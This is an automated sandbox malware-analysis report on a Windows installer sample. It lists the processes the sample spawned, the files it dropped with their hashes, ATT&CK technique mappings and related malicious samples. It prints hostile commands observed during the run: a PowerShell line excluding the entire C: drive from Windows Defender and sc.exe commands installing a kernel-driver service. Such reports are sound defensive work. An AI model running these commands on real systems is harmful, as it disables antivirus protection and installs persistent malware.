Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_009157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_009157D0
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Code function: 6_2_6C799D66 mov eax, dword ptr fs:[00000030h] 6_2_6C799D66
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Code function: 6_2_6C799D35 mov eax, dword ptr fs:[00000030h] 6_2_6C799D35
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Code function: 6_2_6C78F17D mov eax, dword ptr fs:[00000030h] 6_2_6C78F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Code function: 6_2_6C788CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C788CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Code function: 6_2_6C857700 cpuid 6_2_6C857700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0089AB2A GetSystemTimeAsFileTime,10_2_0089AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00930090 GetVersion,10_2_00930090
MITRE ATT&CK Matrix

The matrix is listed here per tactic column. A number in parentheses is the count marker shown in that matrix cell, reproduced as extracted; techniques without a number are the unmatched matrix template entries.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1), Command and Scripting Interpreter (2), Service Execution (1), Native API (1), Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: Windows Service (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Access Token Manipulation (1), Windows Service (1), Process Injection (111), DLL Side-Loading (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: Masquerading (11), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (231), Access Token Manipulation (1), Process Injection (111), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1), Security Software Discovery (321), Virtualization/Sandbox Evasion (231), Process Discovery (2), Application Window Discovery (1), System Owner/User Discovery (2), File and Directory Discovery (3), System Information Discovery (35), Network Sniffing
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Encrypted Channel (1), Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Behavior Graph ID: 1579795. Sample: #U5b89#U88c5#U52a9#U624b_2...., Startdate: 23/12/2024, Architecture: WINDOWS, Score: 80

Signatures attached to the sample node:
  • Found driver which could be used to inject code into processes
  • PE file contains section with special chars
  • AI detected suspicious sample
  • Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree recovered from the graph (dropped files and per-process signatures as labelled in it):
  • #U5b89#U88c5#U52a9#U624b_2.0.8.exe (drops C:\...\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, PE32)
    • #U5b89#U88c5#U52a9#U624b_2.0.8.tmp (drops C:\Users\user\AppData\Local\...\update.vac, PE32 and C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; signature: Adds a directory exclusion to Windows Defender)
      • #U5b89#U88c5#U52a9#U624b_2.0.8.exe (drops C:\...\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, PE32)
        • #U5b89#U88c5#U52a9#U624b_2.0.8.tmp (drops C:\Users\user\AppData\Local\...\update.vac, PE32; C:\Program Files (x86)\...\trash (copy), PE32+; C:\Program Files (x86)\...\is-596QU.tmp, PE32+; 3 other files (1 malicious); signatures: Query firmware table information (likely to detect VMs), Protects its processes via BreakOnTermination flag, Hides threads from debuggers, Contains functionality to hide a thread from the debugger)
          • 7zr.exe (two instances; the first drops C:\Program Files (x86)\...\tProtect.dll, PE32+)
            • conhost.exe (one per 7zr.exe instance)
      • powershell.exe (signature: Loading BitLocker PowerShell Module)
        • conhost.exe
        • WmiPrvSE.exe
  • cmd.exe (two instances shown, plus 31 other processes)
    • sc.exe (five instances shown, plus 27 other processes)
      • conhost.exe (one per sc.exe instance, plus 26 other processes)

Source | Detection | Scanner | Label | Link
#U5b89#U88c5#U52a9#U624b_2.0.8.exe | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 11% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\is-596QU.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\update.vac | 11% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\update.vac | 11% | ReversingLabs | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.dr | false | | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_2.0.8.exe | false | | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.dr | false | | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.dr | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2051170851.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2050682545.0000000003620000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000000.2053270375.0000000000D01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000000.2073520799.000000000087D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.dr | false | | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.dr | false | | high
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2051170851.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2050682545.0000000003620000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000000.2053270375.0000000000D01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000000.2073520799.000000000087D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.dr | false | | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.dr | false | | high
No contacted IP infos

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579795
Start date and time: 2024-12-23 09:14:43 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_2.0.8.exe (renamed because the original name is a hash value)
Original Sample Name: _2.0.8.exe
Detection: MAL
Classification: mal80.evad.winEXE@128/32@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 28
• Number of non-executed functions: 76
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.3.187.198, 13.107.246.63
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: #U5b89#U88c5#U52a9#U624b_2.0.8.exe

Time | Type | Description
03:15:37 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp modified
03:15:40 | API Interceptor | 27x Sleep call for process: powershell.exe modified
                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | fiFdIrd.txt.js | malicious | Unknown | 199.232.210.172
 | 5XXofntDiN.exe | malicious | LummaC | 199.232.210.172
 | p3a0oZ4U7X.exe | malicious | Unknown | 199.232.214.172
 | lKin1m7Pf2.lnk | malicious | Unknown | 199.232.210.172
 | fKdiT1D1dk.exe | malicious | RHADAMANTHYS | 199.232.214.172
 | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | malicious | Unknown | 199.232.210.172
 | Support.Client.exe | malicious | ScreenConnect Tool | 199.232.214.172
 | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown | 199.232.210.172
 | Rechnung736258.pdf.lnk | malicious | LummaC | 199.232.214.172
 | Company Information.pdf.lnk | malicious | Unknown | 199.232.210.172
                      No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_2.0.6.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_2.0.6.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_2.0.5.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_2.0.5.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | malicious | Unknown
 | Zt43pLXYiu.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_1.0.9.exe | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: Zt43pLXYiu.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999215745260699
Encrypted: true
SSDEEP: 6144:Dnbtt5aahwi4Ulbr03HqdUCN6/MTiaTbGyT3t5SNbmMMnfrQQn1:7bz5aEwnUlXdig1GOqMnjQk
MD5: 27553992B3783B5FA91E0E458FDC0EC6
SHA1: 4B9942712CA58096EDC8EBF6C2768118D484D642
SHA-256: 085A6E2610BAB0693097B27904CCFAD2653414660196498904013DE4E2EDA58C
SHA-512: A695CA377F745EF09A8DBBA1A8513D7C76622A7112ABCC37120BBF430866B2BDE09056CAF6A25F49AFB0FC6C8951FD9DA4AA952AD466CFFCF571DB366BE3B03C
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3598848
Entropy (8bit): 7.004949099807939
Encrypted: false
SSDEEP: 49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5: 1D1464C73252978A58AC925ECE57F0FB
SHA1: 30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256: 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512: 40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 11%
Process: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
File Type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 5649408
Entropy (8bit): 6.392614480390128
Encrypted: false
SSDEEP: 98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5: 8C71B86BF407C05BAF11E8D296B9C8B8
SHA1: 6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256: BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512: BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):249984
                                          Entropy (8bit):7.999215745260699
                                          Encrypted:true
                                          SSDEEP:6144:Dnbtt5aahwi4Ulbr03HqdUCN6/MTiaTbGyT3t5SNbmMMnfrQQn1:7bz5aEwnUlXdig1GOqMnjQk
                                          MD5:27553992B3783B5FA91E0E458FDC0EC6
                                          SHA1:4B9942712CA58096EDC8EBF6C2768118D484D642
                                          SHA-256:085A6E2610BAB0693097B27904CCFAD2653414660196498904013DE4E2EDA58C
                                          SHA-512:A695CA377F745EF09A8DBBA1A8513D7C76622A7112ABCC37120BBF430866B2BDE09056CAF6A25F49AFB0FC6C8951FD9DA4AA952AD466CFFCF571DB366BE3B03C
                                          Malicious:false
                                          Preview:.@S......:..,..............Q.5..]Y`W;>I1.........e..V......_D%{...Kgh"-....gp....9r...Y...YUa(...<....<.^..8H..^.Gy.${.%..~..k.v..B.....GWQ...I..n..b.DL...38...3..?" ..E.\..%....>...........)h./.\......._..6..;. ....&....%S?ci.....v.4..[...!.g.9*:;H......L......XDE6"..^..o.7.sa.(......O.B.R.$...'1).U...'.L.@.Q..b....=s.^.H...v.:-...h_d...?...l.Q......(....L...@x..>.f.Y..W.........8.y...m...#...a...............oK.U..*f...5.....7\r..5h...s...V...L.s..`ulZQ.Q'tt...._...x...3/T.=Y.@o.....H>..nZJ.....u.........|9.D8....V..O...Vn.0...P.."....+.k./...*...X_...O...q...h.....8..x.......:..u.>;../.. s.(..;....~.....4....\"..f&.7..D...v:.f ...[...2.A...k,..\....E.}.\...9a.....L.N.W,%...Hj.r)..X..G?.,fZ..p..p....s.1..q..f.:9..8>.......&...r....{.N.......;gF....}....S...AP1e.U-...:.....`.....J.<..}.....T.N.c..8..D.un..!./.....%9Ir.......b..[2.]..6...p.5.,6..N..._b....:.n..=.....)..E..gM...Jx}.Rev..0'..F2.......\c$Cf.ebv.8@,'.....j....e.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996595860667214
                                          Encrypted:true
                                          SSDEEP:1536:/lBrxiashuLNO1AXWcsxlym3ti9dYMiws64CC1:tl09uLN9XWcsGWMjQ
                                          MD5:BED02A7F3595752B8EB5F0BA75FC4049
                                          SHA1:972F9A2F3D7F2013AEA0301C9D59FCBD28D28D17
                                          SHA-256:BA10B5E5CE9E4E9C365CF935D44445C55915627F4E064A4D562B99DD716EFA01
                                          SHA-512:383AE35A3D3CB74F8748B5F7D2A637FF2F381ED6FC2AF42A751BA3A4DC10DDC009EFE76942312A385F4184D717BD73A0121225E5C9963D94652BBA161F7331C9
                                          Malicious:false
                                          Preview:.@S....,.?pl ..............|.$...v.....Kb{.{-..(P|bY...`H.5...S_k.9y_.oL...>3.^fq6K...r.>ju.......oc...r..|Rr.4C}h. ..T.\.n>Xq...Z.W0..Z.......=..z.y{.B..c.."..c..qJ.R..p....7.(5......K..g8y.~.....kam.1Op..N..z..n.../..R......3....m.....P%..Lo....3.I.j1..X....q{x5.r.!..N..V.&..O.n.u.N.O.f.O..3....rm..t.....w...CuH6ZrL..E...wUe.........{.a.F...#r..?Z.i...k...|d.. .C.G...Y.d.]....(?e.&....9......0..5.........]......3..r+.qV*1Dn.........#.qc......R.yz4<..8..@b.zR...-(...z..ZL_ >.d......3...8P.f.....;.....L.S. .w._..]...[9$...?-j..P...a.....bX~!.1..x...3.Q..%..#N.;.dG...I9...@l..lf.wB......z....4.B.<...88....~L....$.x.Y.h.hm.|Vz...LjR{`.....GC.O.....Y....O7.....Q.XG@+%..P..=MQo..2{.JE..c..2M......#-...d|y..t.A.n|..o........q|...c`.s".Iz.|s.TFa...s}j..|q9.....eE%{7...?L=..K.pG6..&?.`;o..a.+.8c...S.IF.%...L..O|..yX.5Wm}..;b..tu1...:..5F9.v....Z>{D..........D.e.8..o..kD...[j...<..L...;.-.........1LV.3`Y..I....BTx.yYZb...&...F..&....L@.TH.&.n(L......>
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996595860667213
                                          Encrypted:true
                                          SSDEEP:1536:mj0GkM8N47lyeF28eFwvcOcSi2d+9XRy9bCoXVDnCk:XFN4ByE2vOfi2dOIbBlD1
                                          MD5:C929E760F67447FA177B07396506CB37
                                          SHA1:38B24E181AB4FE7D2A4561B7981C52213C711703
                                          SHA-256:21BCE6971B29976BB17DBC49E5E918FAE4004221F2B38E12B592960F1AA3C336
                                          SHA-512:A51DFB40B70AA47278D094C33470F4450302FFCA2558E7397F1C31B46EC174D644BC1112C86B20762D87E7BFCC5046C15DFA8FA56F80BF2A8A31BE8947F70029
                                          Malicious:false
                                          Preview:7z..'....9.........2........<..w,..C^...\..{>.......}.U}....;..G..]eS..m....q. N...._.V}..?l..keH..v.......~.B1._.^...3.1.........M6..v.k.9....P.~.....-.....I.@+....'.Q....AJ./T......Ed.ly.........4..O..~>..\.4Q...A...{zB.. .&N4...Z...L......u8.I:).....).U...../.*.<G.y....6.h.*..B.e./.U...<...9.$.E.j>......./.......=@oK.~.7..i..t..i;.>"q...L^....X.......`...U.3.g.I.j.......=ym..l.O......jX..*I...B....3.{......H......eRsN...<....lS..R..(....ff.3Y.3..J|a..R...........q..jI..r...1.,.l.J.|u.Z.\(.D.x.......<..KYN....@o..o...@a...jM.{s......|.O.Kq-....W.no.I....Q0*..i^.........O.43.x.@55(.....XG3a..e_....c12..b.x.;....e...D.......9..[Q..v.4..lq..3sq>.....Sf.2x..........V......#m.h..">..0.T...&5..`.M..^.........TbXRI.#D.....s..4..H...a....".....o...,.:,G....]8....#W.J...e.....o|.....c........Nz..|v..G4..@...5h}.b\...47..[7..i.2.A....ST...0M/3xs}...d.D..*cz..K....m.3y.e..F...m.( .D,.8.._.........z...]....Tzd..lD..-A..I..)..(....".O...
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996966859255975
                                          Encrypted:true
